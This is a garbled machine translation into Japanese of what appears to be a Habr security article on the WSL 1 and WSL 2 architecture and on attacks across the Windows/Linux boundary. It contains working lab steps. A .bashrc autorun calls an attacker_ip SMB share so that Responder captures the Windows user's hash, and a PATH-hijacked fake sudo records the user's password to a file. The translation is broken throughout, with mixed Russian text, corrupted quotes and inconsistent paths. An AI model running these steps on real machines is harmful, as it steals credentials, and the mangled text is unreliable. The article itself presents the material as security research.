WSL 実験。パート1

こんにちは、ハブ！ OTUSは10月に新しいコースストリームを開始します "安全性 Linux»。コースの開始に先立ち、講師の一人である Alexander Kolesnikov が執筆した記事を皆さんと共有します。

2016年にマイクロソフトはITコミュニティに新しいWSLテクノロジーを導入しました（Wインドウ Subsystem用 L（Linux）は、長期的には、一般ユーザーと上級ユーザーの両方からの人気を巡って争っていた、これまで相容れない競合相手同士の統合を可能にした。 Windows и Linuxこの技術によって、OSツールを使用できるようになった。 Linux вокружении Windows 起動する必要なく Linux例えば、マルチブートを使用するなど。Habr では、WSL を使用するメリットを説明する記事が多数見つかります。しかし、残念ながら、この記事を書いている時点では、このオペレーティングシステムの共生のセキュリティに関する研究は、このリソースでは見つかりませんでした。この記事は、これを是正するための試みです。この記事では、WSL 1 および 2 アーキテクチャの特徴について議論し、これらのテクノロジーを使用するシステムに対する攻撃の例をいくつか分析します。記事は 2 つの部分に分かれています。最初の部分では、主な理論的攻撃方法を紹介します。 Linux и Windows第2回の記事では、テスト環境の構築と攻撃の再現について解説します。

WSL 1: アーキテクチャ機能

WSLのセキュリティ問題を完全に理解するには、サブシステムの実装に関連する重要なニュアンスを特定する必要があります。WSLが対応する主なユーザーニーズの1つは、ターミナルアクセスを有効にすることです。 Linux ホスト上のOSを搭載したシステム Windowsまた、提供された互換性は非常にネイティブで、実行ファイルは Linux （ELF）はシステム内で直接発射される可能性がある Windowsこれらの目標を達成するために Windows 10 アプリケーションを起動できるようにする特別なサブシステムが作成されました Linux 特定のシステムコールのセットを使用する - そのため、システムコールのセットをマッピングする試みが行われた Linux на Windows物理的には、これは新しいドライバと新しいプロセス形式を追加することで実現されました。視覚的には、アーキテクチャは次のようになります。

基本的には、オペレーティングシステムとのやり取り Linux 複数のカーネルモジュールと特殊なプロセスタイプであるpicoを使用して構成されています。上の図は、インスタンスで実行されているプロセスを示しています。 Linux ホスト上ではネイティブである必要があり、通常のアプリケーションと同じリソースを使用する必要があります。 Windowsしかし、これはどのように実現できるのでしょうか？プロジェクトでは Drawbridge プロセスコンセプトは、 Windowsこれは、（バージョンに応じて）別のOSからアプリケーションを実行するために必要なすべてのオペレーティングシステムコンポーネントを提供しました。

提案された抽象化により、オペレーティングシステムに依存しないことが可能になったことに注意してください（特に、 Windows）別のOSプロセスが起動することを想定しており、一般的なアプローチを提案した。

したがって、ピコプロセス内のアプリケーションは、カーネルに関係なく実行できる。 Windows:

1. システムコールの互換性と翻訳の問題は、特別なプロバイダーによって解決される必要があります。
2. アクセス制御はセキュリティモニタを介して実装する必要があります。モニタはカーネル内にあり、したがって Windows このようなプロセスを提供する新しいドライバという形でのアップグレードが必要でした。プロトタイプのピコプロセスを概略的に以下に示します。

ファイルシステムのため Linux ファイル名とディレクトリ名には大文字と小文字が区別されます。 Windows WSLで使用するために、VolFSとDriveFSという2種類のファイルシステムが追加されました。VolFSはファイルシステムの実装です。 LinuxDriveFSは、ルールに従って動作するファイルシステムです。 Windowsただし、名前の大文字と小文字を区別するかどうかを選択するオプションがあります。

WSL 2

WSL 1には、幅広いタスクの解決に利用できないような多くの制限がありました。例えば、32ビットを実行する機能がありませんでした。 Linux アプリケーションはデバイスドライバを使用できませんでした。そのため、2020年にWSL 2がリリースされ、サブシステムの構築方法が変更されました。WSL 2は、WSL 1のリソース消費特性に一致するように最適化された仮想マシンです。現在、ユーザーが解決しようとしている問題に応じて、OSは Windows作業に必要なサブシステムのバージョンを選択できます Linux潜在的な脆弱性を軽減するために、WSL 2 は Hyper-V をベースに実装されました。 Windows 10この形式で Windows オペレーティングシステムカーネルを単独で実行する機能を持つ LinuxWSLのバージョン1は、開発の方向性を示すためのベータ版機能として導入されたことを覚えておく価値がある。 Windows この分野では、Hyper-Vへの移行は必然でした。最終的なアーキテクチャは次のようになります。

このバージョンでは、システムカーネルは Windows и Linux それぞれが独自のリソースを持ち、ファイルシステム内でのみ重複するが、その重複は完全なものではない。ファイルシステム間の相互作用は、9Pプロトコル上で動作するクライアント/サーバーラッパーを介して行われる。

現在、Microsoft は WSL 1 と WSL 2 を切り替える機能を提供しています。両方のバージョンを使用できます。

WSL セキュリティ

現時点では、正当な OS ツールを使用してサブシステム間の相互作用を攻撃するいくつかのアプローチを説明する研究がいくつかあります。私たちは彼らのシナリオを使用して、この記事の執筆時点での攻撃の関連性を確認します。攻撃とシナリオの一般的なリスト:

1. ファイルシステムの実装: アクセス権、共有ディレクトリ/データ交換メカニズムの可用性。

調査は、アクセス規則違反があったかどうかを判断するために実施されました。 Linux FS->Windows FS、 Windows FS->Linux FS。調査により、対象 OS 内で特定のファイルを変更できることが実証されています。ファイルシステムの一部を置き換えたり、複製したり、削除したりする試みもありました。

シナリオ：

• A. オペレーティングシステムからの攻撃 Windows — OSの/etcディレクトリ内のファイルの変更 Linux.
• B. オペレーティングシステムからの攻撃 Linux — ディレクトリ内のファイルの変更: C:Windows, C:Program Files, C:Users<User>

2. ネットワーク スタックの実装。

この研究は、オペレーティングシステムからの攻撃の例を用いて実施された。 Linux на Windowsネットワークスタックの運用上の機能、特に各種リソースに対する認証メカニズムが悪用された。

シナリオ：

• システム内で使用中のポートへのアクセスを開放する Windows
• 適切な権限なしでポートを開く
• オペレーティングシステム内でELFファイルを使用してリバースシェルを実行する Windows.

3. WSL サブシステムを使用してマルウェア プロセスの起動を隠します。

この研究は、WSL 1 の場合、セキュリティ サブシステムはオペレーティング システムからの正当なプロバイダーを使用して動作する別のコアのイベントを傍受できないという単純な事実に基づいています。WSL 2 の場合、軽量仮想マシン内の別のコアで発生するイベントを表示する方法はありません。

シナリオ：

1) システムへのリモート アクセス用のアプリケーションを起動し、記録されたイベントを表示します。

WSL 1 実験: ハッシュハイジャック (OS Windows)

いよいよ実践的な部分に入ります。まず、テスト環境をセットアップする必要があります。すべての実験は、テストベンチ上で実施されます。 Windows 10 2004年。WSL用に選ばれたオペレーティングシステムイメージは Ubuntu 4月18日。画像はランダムに選択されたもので、他の画像でも同様に機能します。スタンドのセットアップコマンド：

まず実行する必要があります powershell.exe 管理者として。

WSL 1 の場合は、次のコマンドを実行する必要があります。

1. 有効にする-Windowsオプション機能 -オンライン -機能名 Microsoft-Windows-サブシステム-Linux #WSL機能を有効にする
2. Invoke-WebRequest -Uri aka.ms/wsl-ubuntu-1804

-OutFile ~/Ubuntu.appx -UseBasicParsing #画像を読み込む Linux Microsoft Storeから

システムを再起動後、bashコマンドを実行してください。すべてが正しく動作していれば、コンソールに以下のような出力が表示されます。 Windows:

攻撃者のマシンとしては、Kali Linuxディストリビューションを使用します。 Linuxすべてのマシンは同じローカルネットワーク上に存在する必要があります。

マシン上でWSLへの非特権アクセスが可能だと仮定しましょう。 Windowsオペレーティングシステムを攻撃してみましょう。 Linuxコマンドを呼び出す Linux攻撃を実行するために、簡単な自動実行の手法を使用します。つまり、スクリプトを環境に追加します。 Linuxこれを行うには、ファイルを変更する必要があります .bashrc.

WSL を搭載したマシンで、次を実行します。

	1. bash
	2. Переходим в домашнюю директорию пользователя: cd /home/sam/
	2. echo  «/home/sam/.attack.sh» >> .bashrc
	3. echo «icalcs.exe » \\\\attacker_ip\\shareName\\» > /dev/null 2>&1» >> .attack.sh
	4. chmod u+x .attack.sh
	5. exit

カリカーで Linux 実行します:

1. Responder -I eth0 -rdvw

Намашине Windows bashを実行しましょう。

Kaliマシンでの結果を待っています。 Linux:

ユーザーハッシュを取得しました Windows WSLサブシステムを介してシステム上でコマンドを実行する Linux.

WSL 1 実験: ユーザーパスワードの取得 (OS) Linux)

もう1つ実験をしてみましょう。このチェック中にファイルを補足します .bashrc オペレーティングシステムのユーザーパスワードを取得するためのいくつかのコマンド Linux.

bash を起動してコマンドを入力しましょう:

1. mkdir .hidden
2. echo "export PATH=$HOME/.hidden/:$PATH:" >> .bashrc
3. echo "read -sp "[sudo] password for $USER: " sudopass" > .hidden/sudo
4. echo "echo """ >> .mysudo/sudo
5. echo "sleep 2" >> .mysudo/sudo
6. echo "echo "Sorry, try again."" >> .mysudo/sudo
7. echo "echo $sudopass >> /home/sam/.mysudo/pass.txt» >> .mysudo/sudo
8. echo "/usr/bin/sudo $@" >> .mysudo/sudo
9. chmod +x .mysudo/sudo
10. exit

攻撃を成功させるには、ユーザーSamがターミナルでsudoコマンドを実行する必要があります。 Linuxその後、OSユーザーのパスワード Linux ファイル内にあります pass.txt:

攻撃の実装は理論的な理解のみを目的として提供されています。

記事の次の部分では、9P プロトコルの実装について説明し、このプロトコル用のスキャナーの作成を検討し、それを使用して攻撃を実行します。

参考文献

• WSL 2 悪の研究
• Windows のサブシステム Linux ドキュメント

続きを読む

• カーネルパッチ適用ソフトウェアの選び方 Linux リアルタイムで

出所： habr.com